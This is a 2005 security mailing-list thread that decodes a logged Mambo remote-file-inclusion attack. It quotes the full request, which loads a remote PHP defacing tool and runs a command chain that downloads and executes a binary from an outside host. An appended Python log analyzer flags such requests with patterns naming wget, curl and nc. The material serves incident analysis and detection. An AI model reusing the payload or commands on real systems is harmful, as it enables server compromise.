[Dshield] Can Someone Decipher This Log Entry?

Meidinger Chris chris.meidinger at badenIT.de
Thu Dec 22 09:51:11 GMT 2005


Hi David,

Google tells me that com_content is part of Mambo, which is an open source mini-CMS.

So it looks like a hole in index2.php

<hole> 
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path
</hole> 

which can be used to execute code from a URL

<url>
http://209.136.48.69/cmd.gif
</url>

What is at that URL?
(cmeid at phantom)(285/pts/9)(10:46am:12/22/05)-
(%:~/LIVE-MALWARE)- wget http://209.136.48.69/cmd.gif &> /dev/null
(cmeid at phantom)(286/pts/9)(10:46am:12/22/05)-
(%:~/LIVE-MALWARE)- file cmd.gif
cmd.gif: exported SGML document text
(cmeid at phantom)(287/pts/9)(10:46am:12/22/05)-
(%:~/LIVE-MALWARE)- head cmd.gif
<!--
Defacing Tool 2.0 by r3v3ng4ns
revengans at gmail.com
se for modificar o codigo, por favor, mantenha o nome de seus autores originais
e por favor, entre em contato comigo...

ae galera, serio, tem mta gente fdp q simplismente usa, nao seja soh um sucker do script,
n seja um lammer imbecil, n seja o merda dum script kiddie, n seja um babaca, ajude a melhora-lo tambem!!
-->
<?php
(cmeid at phantom)(288/pts/9)(10:46am:12/22/05)-
(%:~/LIVE-MALWARE)-

So it's a defacing tool, which accepts command parameters:

<parameters>
&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 200 21 "-"
</parameters>

which tell it what to deface and how.

Fun stuff, huh?

Cheers,

Chris

-----Original Message-----
From: list-bounces at lists.dshield.org on behalf of David Cary Hart
Sent: Wed 21-Dec-05 22:53
To: DShield General Discussion List
Subject: [Dshield] Can Someone Decipher This Log Entry?
 
I have about 25 of these today. I've added index2.php to the firewall watcher.
I cannot make sense of this Apache print:

85.190.1.171 - - [21/Dec/2005:16:47:41 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 200 21 "-"

-- 
Our DNSRBL - 
           Eliminate Spam: http://www.TQMcube.com/spam_trap.php
          Multi-RBL Check: http://www.TQMcube.com/rblcheck.php
            Zombie Graphs: http://www.TQMcube.com/zombies.php
              GeoGraphics: http://www.TQMcube.com/origins.php
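As an added example (not from the thread), a small Python check that parses an Apache access-log line like the one above and flags the three things Chris points out: superglobal overrides (GLOBALS=, _REQUEST[...]), mosConfig_absolute_path pointing at a remote URL, and a shell pipeline in the cmd= parameter. The sample line is David's log entry; the regexes and names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Apache common/combined log prefix up to the status code and response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)
# register_globals-style overrides of $GLOBALS / $_REQUEST in the query string
GLOBALS_RE = re.compile(r'\b(GLOBALS|_REQUEST|_GET|_POST|_COOKIE|_SERVER)\b(\[|=)')
# a parameter value that is itself a remote URL (remote file inclusion)
REMOTE_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
# a shell pipeline: separators plus a downloader/interpreter name
SHELL_RE = re.compile(r'\b(wget|curl|chmod|sh|bash|perl|python|nc)\b')

# The log line from David's post (constructed copy for this example).
SAMPLE_LINE = (r'85.190.1.171 - - [21/Dec/2005:16:47:41 -0500] "GET /index2.php?option=com_content'
               r'&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS='
               r'&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20'
               r'209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 200 21 "-"')

def parse_query(query):
    """Split a raw query string on '&' and URL-decode each key/value pair."""
    pairs = []
    for chunk in query.split('&'):
        if chunk:
            key, _, value = chunk.partition('=')
            pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs

def analyze_log_line(line):
    """Return request details plus a list of (finding, parameter) tuples, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    split = urlsplit(m.group('target'))
    params = parse_query(split.query)
    findings = []
    if GLOBALS_RE.search(unquote_plus(split.query)):
        findings.append(('superglobal_override', 'GLOBALS/_REQUEST in query'))
    for key, value in params:
        if REMOTE_RE.match(value):
            findings.append(('remote_file_inclusion', key))
        if (';' in value or '|' in value) and SHELL_RE.search(value):
            findings.append(('command_injection', key))
    # A 200 here only says the script answered; it does not prove the include worked.
    return {'ip': m.group('ip'), 'path': split.path, 'status': int(m.group('status')),
            'params': dict(params), 'findings': findings}

if __name__ == '__main__':
    for finding, where in analyze_log_line(SAMPLE_LINE)['findings']:
        print(f'{finding}: {where}')
```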